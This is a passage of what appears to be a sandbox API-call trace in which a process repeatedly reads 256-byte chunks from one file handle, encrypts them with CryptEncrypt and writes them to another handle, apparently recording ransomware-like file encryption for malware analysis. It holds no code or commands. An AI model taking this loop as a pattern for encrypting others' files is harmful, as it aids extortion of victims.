lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.509] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.509] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.509] GetLastError () returned 0x0 [0148.509] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.509] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.509] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.509] GetLastError () returned 0x0 [0148.509] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.510] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.510] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.510] GetLastError () returned 0x0 [0148.510] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.510] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.510] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.510] GetLastError () returned 0x0 [0148.510] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.510] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.510] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.510] GetLastError () returned 0x0 [0148.510] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.510] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.510] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.510] GetLastError () returned 0x0 [0148.510] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.510] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.510] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.510] GetLastError () returned 0x0 [0148.510] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.510] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.510] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.510] GetLastError () returned 0x0 [0148.510] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.510] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.511] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.511] GetLastError () returned 0x0 [0148.511] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.511] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.511] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.511] GetLastError () returned 0x0 [0148.511] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.511] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.511] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.511] GetLastError () returned 0x0 [0148.511] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.511] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.511] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.511] GetLastError () returned 0x0 [0148.511] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.511] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.511] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.511] GetLastError () returned 0x0 [0148.511] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.511] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.511] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.511] GetLastError () returned 0x0 [0148.511] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.511] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.511] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.512] GetLastError () returned 0x0 [0148.512] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.512] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.512] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.512] GetLastError () returned 0x0 [0148.512] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.512] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.512] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.512] GetLastError () returned 0x0 [0148.512] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.512] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.512] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.512] GetLastError () returned 0x0 [0148.512] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.512] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.512] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.512] GetLastError () returned 0x0 [0148.512] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.513] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.513] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.513] GetLastError () returned 0x0 [0148.513] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.513] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.513] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.513] GetLastError () returned 0x0 [0148.513] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.513] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.513] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.513] GetLastError () returned 0x0 [0148.513] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.513] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.513] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.513] GetLastError () returned 0x0 [0148.513] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.513] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.513] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.513] GetLastError () returned 0x0 [0148.513] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.513] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.513] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.513] GetLastError () returned 0x0 [0148.513] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.513] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.514] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.514] GetLastError () returned 0x0 [0148.514] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.514] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.514] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.514] GetLastError () returned 0x0 [0148.514] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.514] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.514] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.514] GetLastError () returned 0x0 [0148.514] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.514] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.514] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.514] GetLastError () returned 0x0 [0148.514] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.514] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.514] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.514] GetLastError () returned 0x0 [0148.514] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.514] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.514] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.514] GetLastError () returned 0x0 [0148.514] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.514] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.514] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.514] GetLastError () returned 0x0 [0148.515] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.515] ReadFile (in: 